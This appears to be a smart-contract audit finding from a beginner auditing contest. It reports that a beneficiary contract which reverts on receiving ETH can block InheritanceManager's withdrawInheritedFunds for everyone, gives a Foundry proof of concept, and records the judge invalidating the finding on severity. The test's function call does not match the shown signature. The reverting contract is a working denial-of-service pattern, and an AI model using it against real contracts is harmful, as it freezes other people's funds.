Beginner FriendlySolidity
100 EXP
View results
Submission Details
Severity: high
Invalid

In `InheritanceManager:WithdrawInheritedFunds`, there is a risk of a Denial of Service (DoS) attack if one of the beneficiaries is a contract that reverts upon receiving ETH.

Description: In InheritanceManager:WithdrawInheritedFunds, it will loop through the beneficiaries array and transfer the asset to all beneficiaries.
If one of the beneficiaries is a contract that reverts on receiving ETH, the whole withdraw process will be reverted, all beneficiaries will not receive the ETH.

function withdrawInheritedFunds() external {
...
for (uint256 i = 0; i < divisor; i++) {
address payable beneficiary = payable(beneficiaries[i]);
@> (bool success,) = beneficiary.call{value: amountPerBeneficiary}("");
require(success, "something went wrong");
}
...
}

Impact: This issue results in potential risks for all beneficiaries not receiving the intended asset.

Proof of Concept: Add an attacker contract with revert on receive function and the following test case to simulate the scenario.

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.26;
contract DoSAttacker {
receive() external payable {
revert();
}
}
function test_DoS_withdrawInheritedFunds() public {
// create hack contract
DoSAttacker attacker = new DoSAttacker();
vm.deal(address(im), 1 ether);
vm.startPrank(owner);
im.addBeneficiery(beneficiary1);
im.addBeneficiery(beneficiary2);
im.addBeneficiery(beneficiary3);
im.addBeneficiery(address(attacker));
vm.stopPrank();
vm.warp(im.getDeadline());
im.inherit();
vm.expectRevert("something went wrong"); // withdraw will fail
im.withdrawInheritedFunds(address(0));
}

Recommended Mitigation:
Suggest redesigning the withdrawal process to allow each beneficiary to withdraw their assets individually.

Updates

Lead Judging Commences

0xtimefliez Lead Judge 4 months ago
Submission Judgement Published
Invalidated
Reason: Non-acceptable severity

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.